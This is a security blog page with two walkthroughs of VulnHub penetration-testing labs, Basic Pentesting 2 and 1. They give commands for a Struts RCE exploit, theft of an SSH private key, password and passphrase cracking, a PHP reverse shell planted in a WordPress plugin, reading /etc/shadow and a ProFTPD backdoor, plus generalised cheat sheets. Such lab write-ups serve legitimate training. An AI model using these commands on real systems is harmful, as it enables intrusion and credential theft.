Categories
Security

VulnHub – Basic Pentesting 2

Setup

Our attacking box is a virtual machine that has the IP 192.168.56.102 and runs an updated Kali Linux 2020.3. Throughout the penetration test, we will try to avoid using any automated exploitation tools. The target is Basic Pentesting 2, a vulnerable virtual machine to practice penetration testing. It has the IP 192.168.56.101 and we have no further information about this target.

Information Gathering

We start by running nmap on the target IP.

nmap -sV -Pn -n 192.168.56.101
Image 1: nmap scan of the target.

We have the following open ports to investigate:

  • SSH server (OpenSSH 7.2p2 on port 22)
  • webserver (Apache 2.4.18 on port 80)
  • Samba (smbd 3.X-4.X on ports 139 and 445)
  • Apache Jserv (1.3 on port 8009)
  • Apache Tomcat (9.0.7 on port 8080)

Let’s check out the webserver first by opening 192.168.56.101:80 in the browser.

Image 2: Connecting to the webserver.

Next, we run nikto to get some more information.

nikto -h 192.168.56.101
Image 3: nikto scan of the target.

Once again, we discover an interesting director called /development/ and we open it in a browser.

Image 4: The /development/ directory.

The directory contains two .txt files that we also open.

Image 5: The dev.txt file.
Image 6: The j.txt file.

It seems like there are at least two users with the initials “J” and “K”. Furthermore “K” seems to be an admin and “J” seems to use a weak password. That’s good to know. Apart from the Apache and SMB servers that we already know about, “K” mentions a struts 2.5.12 REST example. A quick Google search suggests that the default location for that example code is http://192.168.56.101:8080/struts2-rest-showcase-2.5.12.

Image 7: struts2 showcase page.

It seems like the struts2 test is still running. A bit of googling (“struts 2.5.12 cve”) reveals that version 2.5.12 is exploitable with code execution as indicated by CVE-2017-9805 [1].

Exploitation

We find a Python script to exploit the vulnerability by googling “CVE-2017-9805 exploit github” [2] and copy and paste the struts-pwn.py script into a file on our attack box. To test if everything works, we’ll send a ping command to our attack box through the exploit and check for incoming icmp packages with tcpdump on our attack box.

sudo tcpdump -n icmp
python3 struts-pwn.py -u "http://192.168.56.101:8080/struts2-rest-showcase-2.5.12/" -c "ping -c2 192.168.56.102" --exploit

As we can see, the ping is sent from the target machine to our attack box.

Image 8: Receiving icmp packages through the exploit.

At this point we reach a temporary dead end because we tried to run a couple of reverse shells and none worked. It seems like you cannot run any commands with ; or &&. After a while we realized that we could try to run a server and connect to it. Running the default Python 2 webserver on port 9090 on the target machine worked.

python3 struts-pwn.py -u "http://192.168.56.101:8080/struts2-rest-showcase-2.5.12/" -c "python -m SimpleHTTPServer 9090" --exploit

After connecting to 192.168.56.101:9090 with a browser, we get a nice directory listing of the filesystem that we can explore.

Image 9: Directory listing after connecting to the Python webserver.

Post Exploitation

After entering the /home directory, we see that the usernames of “J” and “K” are jan and kay respectively. Our initial thought is to grab /etc/shadow and decrypt jan’s supposedly weak password. However, we only get a 404 when we try to access the file. However, there are a lot of interesting things in kay’s home directory.

Image 10: Home directory of kay.

Unfortunately, pass.bak, which could be a backup file for the password, cannot be accessed. However, the .ssh directory can be entered and contains a private key (id_rsa) that we can download.

curl http://192.168.56.101:9090/home/kay/.ssh/id_rsa > id_rsa

We also note that kay can login as admin, as indicated by the existence of the .sudo_as_admin_successful file.

If we try to login with the obtained key, we get a warning about the persmissions of the key file so we change that first and then connect via ssh.

chmod 600 id_rsa
ssh -i id_rsa kay@192.168.56.101
Image 11: ssh asks for a passphrase.

Unfortunately, ssh asks for a passphrase. We can use john to crack the passphrase but we first have to convert it to a suitable format with ssh2john.py. We will also use a wordlist of common passwords that were exposed after an attack on RockYou [3]. The wordlist comes preinstalled with Kali but we have to unzip it first.

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hash
Image 12: Cracked ssh passphrase.

With the passphrase we ssh into the target machine and immediately try to become root. Unfortunately, we still need kay’s password. Thankfully, we remember the file pass.bak that we couldn’t access before. Sure enough, it contains the correct password and we become root. Mission accomplished 🙂

Image 13: Mission accomplished.

Alternative Attacks

ssh cracking

Since smbd is running on the target, we can use enum4linux to get some information about local users of the system.

enum4linux -r 192.168.56.101
Image 14: Username enumeration with enum4linux.

We can see that there are two local users named “kay” and “jan” on the system. We remember from before, that the user “jan” supposedly has a weak password in /etc/shadow. From this, we deduce that he will probably use weak passwords everywhere and try to crack his ssh password with medusa.

medusa -h 192.168.56.101 -f -g 5 -u 'jan' -P /usr/share/wordlists/rockyou.txt -M ssh
Image 15: Medusa scan for ssh.

Alternatively, we can use hydra, which was a bit faster than medusa.

hydra -l 'jan' -P /usr/share/wordlists/rockyou.txt 192.168.56.101 ssh
Image 16: Hydra scan for ssh.

The scans reveal the password “armando” which we use to ssh to the target machine.

Image 17: We are logged in as user jan.

Unfortunately, we are not allowed to sudo so we have to find another way to escalate our privileges on this machine. Poking around a bit, we see that we can cd into the home directory of kay. From there, we can cd into his .ssh directory and cat id_rsa and repeat the steps from our initial attack to gain root access.

smbd

To get more information about smbd, we scan the smbd ports (139,445) again but this time, we also use nmap’s script scan (-sC) feature.

sudo nmap -sV -sC -Pn -n -p 139,445 192.168.56.101
Image 18: nmap scan of the smbd ports, script scan active.

It seems like the smbd version is 4.3.11. We can also use nmap to enumerate smb shares.

nmap -sV --script=smb-enum-shares -p 445 192.168.56.101
Image 19: Using nmap to enumerate smb shares.

…and nmblookup to lookup NetBIOS names.

nmblookup -A 192.168.56.101
Image 20: nmblookup of target.

We can see that there’s an account named guest. We try to connect without a password.

smbclient -W 'WORKGROUP' //'192.168.56.101'/Anonymous -U''%''
Image 21: Successfull connection to the smb server and extraction of staff.txt.

Let’s see if the smbd is vulnerable by googling “smbd 4.3.11 cvs” which yields a whopping 21 vulnerabilities [4]. The most promising is CVE-2017-7494, also known as SambaCry [5]. Unfortunately, it seems like we are not allowed to write to the share (even though nmap previously reported we have READ/WRITE access), which is a prerequisite for the exploit [6].

Image 22: No write access to the smb share.

We can confirm this with smbmap.

Image 23: smbmap output that confirms that the share is READ ONLY.

This concludes our further tests.

Lessons Learned

Information gathering

Always check out the contents of all non-standard files that you can read. There might be some interesting information (like development and testing environments or notes about password security).

Username enumeration if samba is running:

enum4linux -r TARGET-IP

Exploitation

Listen for incoming ping

Useing tcpdump to listen for a ping is a good way of checking remote code execution. Just run ping -c2 ATTACK-IP from the target box.

sudo tcpdump -n icmp

Run a webserver on the target machine

python -m SimpleHTTPServer PORT

Cracking ssh passwords

medusa -h TARGET-IP -f -g 5 -u 'USERNAME' -P /usr/share/wordlists/rockyou.txt -M ssh
hydra -l 'USERNAME' -P /usr/share/wordlists/rockyou.txt TARGET-IP ssh

Samba

Get information about samba on the target:

sudo nmap -sV -sC -Pn -n -p 139,445 TARGET-IP
nmap --script=smb-enum-shares -p 445 TARGET-IP
nmblookup -A TARGET-IP

Check access rights and list files:

smbmap -R -H TARGET-IP

Connect to a samba share. The argument passed via -U is username%password. If left empty, an annonymous login is tried.

smbclient -W 'WORKGROUP' //'192.168.56.101'/SHARENAME -U ''%''

Post Exploitation

ssh

Always check the home directories for interesting content. SSH keys are especially useful if ssh is running on the target. Get id_rsa either by copy&pasting it or by getting it through a webserver we started.

curl http://IP:PORT/home/USERNAME/.ssh/id_rsa > id_rsa

Connect via ssh with a keyfile:

chmod 600 id_rsa
ssh -i id_rsa USERNAME@TARGET-IP

Cracking ssh pass phrases (RockYou wordlist):

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=SSH id_rsa.hash

Misc

A .sudo_as_admin_successful file indicates, that this user can become root.

Sources

[1] https://www.cvedetails.com/cve/CVE-2017-9805/

[2] https://github.com/mazen160/struts-pwn_CVE-2017-9805

[3] https://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords

[4] https://www.cvedetails.com/vulnerability-list/vendor_id-102/product_id-171/version_id-199625/Samba-Samba-4.3.11.html

[5] https://www.cvedetails.com/cve/CVE-2017-7494/

[6] https://github.com/betab0t/cve-2017-7494#usage

Categories
Security

VulnHub – Basic Pentesting 1

Setup

Our attacking box is a virtual machine that has the IP 192.168.56.102 and runs an updated Kali Linux 2020.3. Throughout the penetration test, we will try to avoid using any automated exploitation tools. The target is Basic Pentesting 1, a vulnerable virtual machine to practice penetration testing. It has the IP 192.168.56.104 and we have no further information about this target.

Information Gathering

Since we are already on the same subnet as the target and we know the IP, the first step is to scan for open ports with nmap. We decide to do a quick TCP scan and have nmap guess the software and versions running on each port (-sV). We also avoid pinging the host (-Pn) and don’t need DNS resolving (-n).

sudo nmap -sV -Pn -n 192.168.56.104
Image 1: Results of an nmap-scan of the target.

Note that this scan took only about 7 seconds. If we were to add UDP scanning as well (-sU) it would take a bit over 18 minutes. We have the following open ports to investigate:

  • FTP server (ProFTPD 1.3.3c on port 21)
  • SSH server (OpenSSH 7.2p2 Ubuntu)
  • webserver (Apache httpd 2.4.18 Ubuntu)

Let’s start with the webserver.

Exploitation

Webserver

The first thing we do is connect to the server with a browser. We are greeted with a default “It works!” page. For good measure we also use “View Source” but that just reveals some plain HTML.

Image 2: Connection to the webserver from the browser.

Next, get a quick overview by running nikto on the webserver.

nikto -h 192.168.56.104
Image 3: nikto scan of the target.

Apart from the fact that the Apache version is outdated (worth checking for exploits) and some other potential vulnerabilities, nikto was able to detect a directory /secret/ which seems worth investigating by accessing it directly in the browser.

Image 4: Connecting to 192.168.56.104/secret with a browser.

Seems like we found a WordPress blog. However, the layout looks broken, and hovering over the “Hello World” link reveals it is pointing to http://vtcsec/secret/index.php/2017/11/16/hello-world/. To fix this, we add a line for vtcsec in the /etc/hosts file of our attacking box.

sudo nano /etc/hosts
... in the file ...
127.0.0.1       localhost
127.0.1.1       kali
192.168.56.104  vtcsec

That fixes things. We can check for the WordPress admin interface by going to 192.168.56.104/secret/wp-admin/. Surprisingly, the default username/password combination admin/admin works and we can access the admin dashboard.

Image 5: WordPress admin dashboard.

Since we can load PHP-Code in WordPress by pasting it into a plugin or by editing the theme (Appearance -> Editor) and refreshing the page, we can install a PHP reverse shell. Kali-Linux comes with a selection of premade shells to pick from.

cat /usr/share/webshells/php/php-reverse-shell.php

To use the reverse shell, we use nc to listen (-l) for incoming connections on a specified port (-p 1122) on our attacking box.

nc -vnlp 1122

We activate the “Hello Dolly” plugin and copy-paste the reverse shell to replace the code of the plugin (Plugins -> Editor) and change $ip and $port to the IP of our attacking box and the target port (1122).

Image 6: Modified WordPress plugin with PHP reverse shell code.

After clicking the “Update File” button, we successfully gain a shell as the user www-data (note that it might appear as if nothing happened but we get the shell as soon as we click the button).

Image 7: Catching the reverse shell with nc.

Post Exploitation

The next step is to escalate our rights from the user www-data to the superuser root. Let’s see what user accounts with a login shell exist on the target machine. We exclude ‘false’ and ‘nologin’ with grep -v.

cat /etc/passwd | grep -v 'false\|nologin'
Image 8: Checking for users that can login.

Apart from the root user, there’s one other user of interest who goes by the handle marlinspike. However, when we try to change to another user…

sudo su

…we only see the error message “sudo: no tty present and no askpass program specified”. So the first thing we need to do is get a tty. There are a couple of different ways to do that [1,2]. We opt for the script method, because it is pretty simple and straightforward.

script -qc /bin/bash /dev/null

Unfortunately, we cannot log in as either root or marlinspike, because we have to provide the password of www-data. Let’s see if we can read /etc/shadow.

cat /etc/shadow | grep 'root\|marlinspike'
Image 9: Inspecting /etc/shadow.

Surprisingly, we are allowed to read the file and so we can grab the hash of the user marlinspike and try to crack it with “John The Ripper”. First, we use nano to create a file called ms.pass where we copy/paste the username:hash part of /etc/shadow and after that we run john on that file from our attacking box.

sudo john -single ms.pass
Image 10: Cracking the password for user marlinspike with john.

As we can see, the password is also marlinspike. We try to ssh into the machine as marlinspike with the freshly cracked password and it works.

ssh marlinspike@192.168.56.104

After checking our sudo rights with sudo -l we can see that we are allowed to become root. Mission accomplished 🙂

Image 11: Sudoing to root.

Alternative Attacks

FTP server

Let’s check out the FTP server to see if there’s another way to get root privileges on the target. A quick Google search for “proftpd 1.3.3c exploit” reveals that this particular version of ProFTPD might contain a backdoor [3]. We can try if that is the case by connecting to the server and issuing “HELP ACIDBITCHEZ”. It works and this time we’ll use another way to get a tty (by using Python). Seems like the FTP server is a very quick way to gain root access.

Image 12: Using the ProFTPD 1.3.3c backdoor to become root.

Lessons Learned

Information gathering

Portscanning

A quick overview of the most common 1000 TCP ports:

sudo nmap -sV -Pn -n TARGET-IP

Webserver

Always check out the website in a browser first and view the source code. Scan a webserver for common vulnerabilities and find directories:

nikto -h TARGET-IP

Edit /etc/hosts on the attacking box to fix broken websites.

Exploitation

Misc

Try default usernames like admin/admin for WordPress (site/wp-admin).

Reverse shell

Use netcat to catch a reverse shell:

nc -vnlp PORT

Copy /paste web reverse shells from Kali’s /usr/share/webshells directory into suitable locations like WordPress plugins and reload the page.

Post Exploitation

tty

script -qc /bin/bash /dev/null
python -c "import pty; pty.spawn('/bin/bash')"

Passwords

Check for users that are allowed to login:

cat /etc/passwd | grep -v 'false\|nologin'

Get the password hash of a user (not allowed by default, as /etc/shadow is not world readable):

cat /etc/shadow | grep 'USERNAME'

Crack a password hash:

echo "USERNAME:HASH" > pw.pass
sudo john -single pw.pass

Sources

[1] https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#tldr-cheatsheet

[2] https://stackoverflow.com/questions/1401002/how-to-trick-an-application-into-thinking-its-stdout-is-a-terminal-not-a-pipe

[3] https://www.securitygeneration.com/security/proftpd-1-3-3c-briefly-backdoored-by-hackers/